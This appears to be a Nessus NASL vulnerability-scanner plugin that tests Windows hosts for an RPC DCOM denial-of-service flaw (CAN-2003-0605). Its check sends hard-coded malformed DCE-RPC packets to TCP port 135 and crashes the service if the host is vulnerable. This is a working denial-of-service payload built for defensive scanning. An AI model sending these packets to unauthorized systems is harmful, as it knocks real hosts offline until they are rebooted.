# # (C) Tenable Network Security # # Original exploit from xfocus.org # Workaround by Michael Scheidell from SECNAP Network Security if(description) { script_id(11798); script_version ("$Revision$"); script_bugtraq_id(8234); script_cve_id("CAN-2003-0605"); if(defined_func("script_xref"))script_xref(name:"IAVA", value:"2003-A-0012"); name["english"] = "RPC DCOM Interface DoS"; script_name(english:name["english"], francais:name["francais"]); desc["english"] = " It is possible to disable the remote RPC DCOM Interface by sending a malformed request to it. The system will need to be rebooted to recover. An attacker may exploit this flaw to remotely disable RPC related programs on this host. Solution : http://www.microsoft.com/technet/security/bulletin/ms03-039.asp Workaround : For a temporary workaround, either filter ALL TCP traffic to this host, including TCP port 135 and ALL ports used for RPC services or disable the Microsoft Distributed Transaction Coordinator NOTE: Turning Distributed Transaction Coordinator in Service panel will NOT fix the problem, the 'dcom' config program must be used instead : >> Start >> Run >> 'dcomcnfg.exe' >> Default Properties Tab Clear the 'Enable Distributed Com on this computer' >>OK Risk Factor : Serious"; script_description(english:desc["english"]); summary["english"] = "Remotely close port 135"; script_summary(english:summary["english"]); script_category(ACT_KILL_HOST); # Crashes everything com-related script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security"); family["english"] = "Denial of Service"; script_family(english:family["english"]); script_require_ports(135); exit(0); } if(!get_port_state(135))exit(0); bindstr = raw_string(0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00); request = raw_string(0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00); soc = open_sock_tcp(135); if(!soc)exit(0); send(socket:soc, data:bindstr); r = recv(socket:soc, length:60); send(socket:soc, data:request); r = recv(socket:soc, length:60); close(soc); sleep(1); soc = open_sock_tcp(135); if(!soc)security_hole(port);